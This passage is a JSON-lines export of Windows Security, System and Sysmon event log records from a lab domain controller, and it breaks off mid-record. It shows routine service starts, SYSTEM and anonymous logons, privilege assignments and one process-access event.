{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":951,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:30.063\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:30.063","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\SYSNTFY.dll+1ad9|C:\\Windows\\System32\\RPCRT4.dll+580d4|C:\\Windows\\System32\\RPCRT4.dll+39ae0|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76798,"ProcessID":856,"ThreadID":1128,"Channel":"System","Message":"The Netlogon service entered the running state.","param1":"Netlogon","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220284,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220285,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76799,"ProcessID":856,"ThreadID":1128,"Channel":"System","Message":"The Spooler service entered the running state.","param1":"Spooler","param2":"running","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220286,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220287,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220288,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220289,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220290,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220291,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220292,"ProcessID":864,"ThreadID":108,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tNo\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x2B97E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tNtLmSsp \r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\tNTLM V1\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-7","TargetUserName":"ANONYMOUS LOGON","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x2b97e","LogonType":"3","LogonProcessName":"NtLmSsp 